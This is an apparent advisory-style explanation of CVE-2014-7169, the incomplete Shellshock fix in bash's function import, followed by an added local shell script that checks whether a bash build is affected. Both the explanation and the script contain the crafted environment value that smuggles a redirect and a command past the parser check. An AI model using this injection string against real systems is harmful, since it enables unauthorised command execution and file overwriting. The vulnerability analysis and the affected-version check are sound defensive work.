CVE-2014-7169: Bash incomplete Shellshock fix — SEVAL_FUNCDEF bypassed via parser lookahead and line-continuation
CVE-2014-7169 is an incomplete fix for Shellshock (CVE-2014-6271) in bash-4.3-p25. To import functions from environment variables safely, the bash function import mechanism in initialize_shell_variables (variables.c:395) calls parse_and_execute with the SEVAL_FUNCDEF|SEVAL_ONECMD flags.

However, the SEVAL_FUNCDEF validation in evalstring.c (lines 364-383) is insufficient: it checks parser_remaining_input(), which inspects only the shell_input_line buffer and NOT the yacc parser's lookahead register (yychar). A crafted environment variable such as BASH_FUNC_X%%='() { (a)=>\', ending in a backslash, triggers the lexer's line-continuation mechanism (shell_getc, goto restart_read, parse.y:2581), so the parser reads beyond the function definition string and consumes characters from the shell's next available input stream. The > redirect inside the malformed function body is then applied, creating or overwriting a file, and trailing commands (date) from the consumed input run with stdout redirected. All of this bypasses the SEVAL_FUNCDEF guard.

CVE class: command injection via an incomplete security check on parser state after parsing untrusted input.
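A local check for the behaviour described above, as an added example that is not part of the original page or of the bash source: it runs the quoted trigger string against a chosen bash binary inside a scratch directory and reports whether the stray redirect created a file. The function name, the scratch-directory approach and the 'echo date' command string are assumptions of this example; the value is exported under both X and BASH_FUNC_X%% because builds differ in which name they import functions from.

```shell
#!/bin/sh
# Added example (not from the page). Exit status of the function:
#   0 = the crafted definition was rejected, 1 = the CVE-2014-7169
#   behaviour was observed, 2 = the check could not run.
check_cve_2014_7169() {
    # Resolve the binary before changing directory (name on PATH or a path).
    c7169_bash=$(command -v "${1:-bash}" 2>/dev/null) || return 2
    # Scratch directory: on an affected build the leftover ">" redirect
    # creates a file here named after the next input word ("echo").
    c7169_dir=$(mktemp -d) || return 2
    c7169_payload='() { (a)=>\'   # trigger string quoted on the page
    (
        cd "$c7169_dir" || exit 2
        # Offer the value under both import names (assumption: the build
        # under test uses one of them). Output and errors are discarded;
        # only the side effect on the scratch directory matters.
        env "X=$c7169_payload" "BASH_FUNC_X%%=$c7169_payload" \
            "$c7169_bash" -c 'echo date' >/dev/null 2>&1
        exit 0
    ) || { rm -rf "$c7169_dir"; return 2; }
    if [ -e "$c7169_dir/echo" ]; then c7169_rc=1; else c7169_rc=0; fi
    rm -rf "$c7169_dir"
    return "$c7169_rc"
}

# Check the bash given as the first argument, or the one on PATH.
check_cve_2014_7169 "${1:-bash}"
case $? in
    0) echo "not affected: no file created by the imported value" ;;
    1) echo "AFFECTED: redirect from the imported value was applied" ;;
    *) echo "check could not run" ;;
esac
```

On an affected build the scratch directory ends up holding a file named echo that contains the output of date; the function deletes the directory either way.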